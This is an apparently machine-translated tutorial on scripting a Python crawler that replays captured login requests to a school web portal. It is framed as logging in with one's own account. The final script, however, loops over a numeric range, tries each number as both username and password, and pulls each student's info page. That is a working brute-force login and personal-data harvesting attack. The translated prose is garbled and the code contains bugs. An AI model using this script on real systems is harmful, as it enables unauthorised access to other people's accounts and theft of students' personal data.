Programmatically login a Python web crawler

I am going to make a web crawler that will login to a school website using my credentials and then crawl certain parts of the site. I am using the Beautiful Soup Python library

Capture packet & analysis HTTP GET&POST Request

The beginning of their own capture package analysis, there have been some problems. Login process analysis is not rigorous, so that when the simulation log cannot log up when the problem, then the seniors to help me under the analysis. The original logon process requires two POST request process, and in the process, before I use the urllib this library to simulate the login, the use of the tips in the use of the request compared to urllib advanced library.

The first POST request

POST /renzheng.jsp HTTP/1.1
Host: target.com
Content-Length: 142
Cache-Control: max-age=0
Origin: http://target.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://target.com
Accept-Encoding: gzip, deflate
Accept-Language: en-US,zh;q=0.8
Cookie: UM_distinctid=15b7be26085454-0504ed9f0e367d-3c365402-100200-15b7be26086832; JSESSIONID=213C06E58934DCED50E4E479858CB055
Connection: close
displayName=&displayPasswd=&select=2&submit.x=36&submit.y=14&operType=911&random_form=-1048366953725273893&userName=admin&passwd=ddos

From the first package we can be seen that the PostData part consists of nine parts:
  • displayName, displayPasswd
  • select, submit.x, submit.y
  • operType, random_form
  • userName, passwd

The second POST package

POST /servlet/adminservlet HTTP/1.1
Host: target.com
Content-Length: 65
Cache-Control: max-age=0
Origin: http://target.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://target.com/admin.jsp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,zh;q=0.8
Cookie: UM_distinctid=15b7be26085454-0504ed9f0e367d-3c365402-100200-15b7be26086832; JSESSIONID=213C06E58934DCED50E4E479858CB055
Connection: close
isValidate=false&userName=admin&passwd=ddos&operType=911

We saw that

  • userName, passwd: these two parameters is the account password, clear text transmission
  • isValidate defaults to false
  • operType defaults to 911

The HTTP GET request

GET /student/studentInfo.jsp?userName=xxxx&passwd=xxxxx HTTP/1.1
Host: target.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://target.com/servlet/adminservlet
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,zh;q=0.8
Cookie: UM_distinctid=15b7be26085454-0504ed9f0e367d-3c365402-100200-15b7be26086832; JSESSIONID=213C06E58934DCED50E4E479858CB055
Connection: close

We saw that

  • userName, passwd: these two parameters is the account password, clear text transmission

Now, we can start to write our python script.

  1. Simulation construct request packet

    In the process of writing Python code, I try to use the object-oriented process, the relevant variables are defined as private variables, in the process of simulating the use of the requests module

    Requests library
    Requests is a Python HTTP library that provides a number of HTTP-related methods that we can use dir (requests) to view the methods provided by the library.

    >>> import requests
    
    >>> dir(requests)
    ['ConnectionError', 'HTTPError', 'NullHandler', 'PreparedRequest', 'Request', 'RequestException', 'Response', 'Session', 'Timeout', 'TooManyRedirects', 'URLRequired', '__author__', '__build__', '__builtins__', '__copyright__', '__doc__', '__file__', '__license__', '__name__', '__package__', '__path__', '__title__', '__version__', 'adapters', 'api', 'auth', 'certs', 'codes', 'compat', 'cookies', 'delete', 'exceptions', 'get', 'head', 'hooks', 'logging', 'models', 'options', 'patch', 'post', 'put', 'request', 'session', 'sessions', 'status_codes', 'structures', 'utils']

    In this process, we use Session, get, post and content method.
    Session

    The session object allows you to keep certain parameters across requests. It also keeps cookies between all requests made by the same Session instance

    >>> s = requests.Session()
    >>> r = s.get(“http://target.com/”)

    GET submission method

    Request the URL of the response in GET commit mode
    >>> r = requests.get(“http://target/”,proxies=proxies,timeout=0.001,params=payload)
    params Pass parameters for GET submission
    r = requests.get(“http://httpbin.org/get”, params=payload)

    proxies If you need to use a proxy, you can configure a single request by providing proxies for any request method:
    import requests
    
    proxies = {
    "http": "http://10.10.1.10:3128",
    "https": "http://10.10.1.10:1080",
    }
    requests.get("http://target.com", proxies=proxies)

     

    requests stop after waiting for the number of seconds set with the timeout parameter:
    >>> requests.get(‘http://github.com’, timeout=0.001)
    Traceback (most recent call last):
    File “”, line 1, in
    requests.exceptions.Timeout: HTTPConnectionPool(host=’github.com’, port=80): Request timed out. (timeout=0.001)
    POST submission method 

    Request the URL of the response in GET commit mode

    requests.post(“http://target.com”, header=header, data=data)

    Here we only need to add a common part

    ‘User-Agent’ : ‘Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36’,
    ‘Content-Type’:’application/x-www-form-urlencoded’,
    ‘Accept’: ‘text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8’,
    ‘Referer’: ‘http://target.com/’,
    ‘Accept-Encoding’: ‘gzip, deflate’,
    ‘Accept-Language’: ‘en-US;q=0.8’

    data – The information submitted for Post
    ‘displayName’ : ”,
    ‘displayPasswd’ : ”,
    ‘select’: ‘2’,
    ‘submit.x’: ’43’,
    ‘submit.y’ : ’12’,
    ‘operType’ : ‘911’,
    ‘random_form’ : ‘5129319019753764987’,
    ‘userName’ : ”,
    ‘passwd’ : ” 

     The part of the code Request

  2. BeautifulSoup library

    BeautifulSoup is a Python library that can extract data from HTML or XML files. It can be used to navigate through custom documents, find and modify documents through your favorite converters. You can also use the dir() method to view BeautifulSoup info

    >>> import BeautifulSoup
    
    >>> dir(BeautifulSoup)
    ['BeautifulSOAP', 'BeautifulSoup', 'BeautifulStoneSoup', 'CData', 'Comment', 'DEFAULT_OUTPUT_ENCODING', 'Declaration', 'ICantBelieveItsBeautifulSoup', 'MinimalSoup', 'NavigableString', 'PageElement', 'ProcessingInstruction', 'ResultSet', 'RobustHTMLParser', 'RobustInsanelyWackAssHTMLParser', 'RobustWackAssHTMLParser', 'RobustXMLParser', 'SGMLParseError', 'SGMLParser', 'SimplifyingSOAPParser', 'SoupStrainer', 'StopParsing', 'Tag', 'UnicodeDammit', '__author__', '__builtins__', '__copyright__', '__doc__', '__file__', '__license__', '__name__', '__package__', '__version__', '_match_css_class', 'buildTagMap', 'chardet', 'codecs', 'generators', 'markupbase', 'name2codepoint', 're', 'sgmllib', 'types']

     Parse it into XML

    By default, Beautiful Soup will parse the current document as HTML, and if you want to parse the XML document, add the second argument “xml” to the BeautifulSoup constructor:

    soup = BeautifulSoup(markup, “xml”)

    find_all()

    The find_all () method returns all the tags in the document that match the condition, and the result is a list of values that contain an element In the process of practice because the required information is included in tables under the label, because the return is a list, use the index to locate the tr position of the response, and then for the loop output td content
    The code for looping tables is as follows:
    tables = soup.findAll('table')  
    
    tab = tables[0]
    for tr in tab.findAll('tr'):
    for td in tr.findAll('td'):
    print td.getText(),

    The part of the BeautifulSoup code

    Thirdrequest = self.__session.get(geturl)
    
    page = Thirdrequest.content
    soup = BeautifulSoup(page,"lxml")
    tr = soup.findAll('tr')
    for i in range(5,14):
    for td in tr[i].findAll('td'):
    print td.getText(),
  3. Exception handling

    The try/except statement is used to detect errors in the try statement block so that the except statement captures exception information and processes it.

  4. The complete Python code
    # -*- coding: utf-8 -*-
    
    # !/usr/bin/python
    import requests
    import time
    import os
    from bs4 import BeautifulSoup
    class UCrawler(object):
    """docstring for UCrawler"""
    __header = {
    'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
    'Content-Type':'application/x-www-form-urlencoded',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Referer': 'http://target.com/',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,zh;q=0.8'
    }
    __data1 = {
    'displayName' : '',
    'displayPasswd' : '',
    'select': '2',
    'submit.x': '43',
    'submit.y' : '12',
    'operType' : '911',
    'random_form' : '5129319019753764987',
    'userName' : 'xxxxxxx',
    'passwd' : 'xxxxxxx'
    }
    __data2 = {
    'isValidate':'false',
    'userName':'xxxxxxx',
    'passwd':'xxxxxxx',
    'operType':'911',
    }
    __posturl1 = 'http://target.com/admin.jsp'
    __posturl2 = 'http://target.com/servlet/adminservlet'
    __session=requests.Session()
    def Firstlogin(self):
    Firstrequest = self.__session.post(self.__posturl1, data=self.__data1, headers=self.__header)
    def Secondlogin(self):
    Secondrequest = self.__session.post(self.__posturl2, data=self.__data2, headers=self.__header)
    def PrintAndGet(self):
    a = range(xxxxxxxx,xxxxxxx)
    for tmp in a:
    try:
    username = str(tmp)
    password = str(tmp)
    self.__data1['userNam']=username
    self.__data1['passwd']=password
    self.__data2['userNam']=username
    self.__data2['passwd']=password
    Firstrequest = self.__session.post(self.__posturl1, data=self.__data1, headers=self.__header)
    Secondrequest = self.__session.post(self.__posturl2, data=self.__data2, headers=self.__header)
    geturl = 'http://target.com/student/studentInfo.jsp?userName'+'='+username+'&'+'passwd='+password
    print '\n'
    except IndexError:
    continue
    if __name__ == '__main__':
    U = UCrawler()
    U.Firstlogin()
    U.Secondlogin()
    U.PrintAndGet()